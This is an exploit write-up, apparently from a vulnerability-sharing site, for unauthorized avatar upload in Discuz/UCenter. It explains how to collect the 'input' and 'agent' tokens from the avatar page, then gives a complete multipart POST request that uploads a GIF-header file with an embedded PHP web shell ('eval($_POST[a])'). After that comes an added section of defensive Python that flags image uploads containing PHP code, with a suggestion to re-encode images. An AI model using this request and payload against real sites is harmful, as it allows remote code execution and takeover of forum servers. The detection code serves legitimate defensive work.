2020-10-31 | PHP | UNLOCK

Discuz unauthorized UploadAvatar

Step 1

Visit /home.php?mod=spacecp&ac=avatar and locate the document.write call to obtain the values of input and agent:

```html
<script type="text/javascript">document.write(AC_FL_RunContent('width','450','height','253','scale','exactfit','src','https://target/uc_server/images/camera.swf?inajax=1&appid=1&input=41cbZ23oN5148ORoSEgeos8JWiES%2B5wDqam00Hxtvsu63YIN%2BWXbh8i5o%2FVN8df5SUes9A1DGqZJaVw4v45OZGDJrV0%2FNmBHMMiq%2FI%2BIssTwT4CydgziZW9aJR2q&agent=0a48e95c5db00f30047be3181e9619dd&ucapi=https%3A%2F%2Ffuckoz.com%2Fuc_server&avatartype=virtual&uploadSize=2048','id','mycamera','name','mycamera','quality','high','bgcolor','#ffffff','menu','false','swLiveConnect','true','allowScriptAccess','always'));</script>
```

Capture input & agent.

Step 2

```http
POST /uc_server/index.php?m=user&inajax=1&a=uploadavatar&appid=1&input=d53a%2BTNCMbXNijOBlKrOMQTbwERgmxDPc2e1rRqPoMfcUK0vvC%2BZcxINh0n4nNThTVPrcwCK7Yh04z2P%2BPPAdlc0DydkdxNlMmIEtKruoRReFjR9iZNaSzzG7IIC&avatartype=virtual  HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36
Content-Type: multipart/form-data; boundary=----------KM7GI3ae0Ef1ei4ae0gL6Ij5ae0GI3
Content-Length: 453

------------KM7GI3ae0Ef1ei4ae0gL6Ij5ae0GI3
Content-Disposition: form-data; name="Filename"

1.gif
------------KM7GI3ae0Ef1ei4ae0gL6Ij5ae0GI3
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: application/octet-stream

GIF89a<?php phpinfo();eval($_POST[a])?>
------------KM7GI3ae0Ef1ei4ae0gL6Ij5ae0GI3
Content-Disposition: form-data; name="Upload"

Submit Query
------------KM7GI3ae0Ef1ei4ae0gL6Ij5ae0GI3--
```
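The request above sends a GIF header followed by PHP source as the avatar file. As an added example that is not part of the original post, the following Python parses such a multipart upload and flags file parts that carry an image header plus a PHP open tag, or an image extension with no image magic number; the boundary, sample body and the input placeholder are constructed for the demonstration.

```python
import re

PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")
IMAGE_EXTS = {"gif", "png", "jpg", "jpeg"}

def split_multipart(raw: bytes):
    """Split a raw multipart/form-data request into (name, filename, content)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    m = re.search(rb"boundary=([^\r\n;]+)", head)
    if not m:
        return []
    delim = b"--" + m.group(1).strip()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter reached
            break
        hdrs, _, content = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = re.search(rb';\s*name="([^"]*)"', hdrs)
        fname = re.search(rb'filename="([^"]*)"', hdrs)
        if content.endswith(b"\r\n"):        # CRLF that precedes the next delimiter
            content = content[:-2]
        parts.append((name.group(1).decode() if name else "",
                      fname.group(1).decode() if fname else None, content))
    return parts

def find_polyglot_uploads(raw: bytes):
    """Flag file parts that claim to be images but carry PHP, or lack image magic."""
    findings = []
    for name, fname, content in split_multipart(raw):
        if fname is None:
            continue                          # plain form field, not a file
        if content.startswith(IMAGE_MAGIC) and PHP_TAG.search(content) is not None:
            findings.append((name, fname, "image header followed by PHP open tag"))
        elif fname.rsplit(".", 1)[-1].lower() in IMAGE_EXTS \
                and not content.startswith(IMAGE_MAGIC):
            findings.append((name, fname, "image extension without image magic"))
    return findings

# Constructed sample shaped like the request above; not a real capture.
SAMPLE_REQUEST = b"\r\n".join([
    b"POST /uc_server/index.php?m=user&a=uploadavatar&appid=1&input=PLACEHOLDER HTTP/1.1",
    b"Content-Type: multipart/form-data; boundary=AaB03x", b"",
    b"--AaB03x", b'Content-Disposition: form-data; name="Filename"', b"", b"1.gif",
    b"--AaB03x", b'Content-Disposition: form-data; name="Filedata"; filename="1.jpg"',
    b"Content-Type: application/octet-stream", b"", b"GIF89a<?php phpinfo();?>",
    b"--AaB03x--", b"",
])
```

Server-side, the durable fix is to decode the upload with an image library and re-encode it, so that anything after the header that is not pixel data is discarded rather than merely scanned for.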
